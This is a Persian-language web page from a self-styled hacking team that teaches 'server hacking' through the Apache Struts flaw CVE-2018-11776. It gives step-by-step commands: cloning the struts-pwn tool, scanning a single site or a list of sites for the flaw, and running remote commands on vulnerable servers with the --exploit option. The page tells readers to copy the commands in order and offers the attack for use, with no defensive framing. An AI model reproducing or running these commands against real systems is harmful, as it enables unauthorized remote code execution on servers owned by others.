• 98XXXXXXXXXX+
  • mynymhmd2@gmail.com
  • TEHRAN-IRAN
  • 98914XXXXXXX+
تیم امنیتی دکترهک

Dr.Hack Team

Android - Windows - Linux

آموزش هک سرور با باگ جدید

در ادامه با یکی از جدیدترین روش ها سرورهکینگ را یاد میگیریم

***کدهارو پشت سرهم کپی کنید***

اموزش هک سرور با استفاده از روش اول

در ابتدا دقت داشته باشید در سیستمی که می خواهید تست اکسپلویت را در ان انجام دهید پایتون 2 یا 3 نصب باشد به دلیل نوشته شدن ابزار به زبان پایتون
ابزار را از بخش دانلود در اخر صفحه دانلود کنید برای دانلود بصورت پوشه در لینوکس خود از دستور زیر استفاده کنید :

git clone Link

سپس با دستور زیر وارد پوشه دانلود شده شوید که ابزار اصلی در ان است 

cd struts-pwn_CVE-2018-11776

برای برسی سایت مورد نظر که ایا به این حفره امنیتی اسیب پذیر است مانند دستور زیر ادرس سایت را وارد کنید

python3 struts-pwn.py –url https://site.com/struts2-showcase/index.action

اگر میخواهید چندین وبسایت را بصورت هم زمان برسی کنید ان ها را در یک فایل ذخیره کنید و فایل خود را بصورت لیست به برنامه بدهید تا سکن شود

python3 struts-pwn.py –list list-site.txt

برای استفاده از این اسیب پذیری و دسترسی ریمود از دستور زیر استفاده شود

python3 struts-pwn.py –exploit –url ‘https://site.com/struts2-showcase/index.action’ -c id

هک سرور از طریق باگ جدید apache struts

 
سفارش محصول
ابتدا یکبار کدامنیتی را تعویض سپس وارد کنید
 
 
تنها امکان ارسال نظر خصوصی وجود دارد
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی
نظر شما به هیچ وجه امکان عمومی شدن در قسمت نظرات را ندارد، و تنها راه پاسخگویی به آن نیز از طریق پست الکترونیک می‌باشد. بنابراین در صورتیکه مایل به دریافت پاسخ هستید، پست الکترونیک خود را وارد کنید.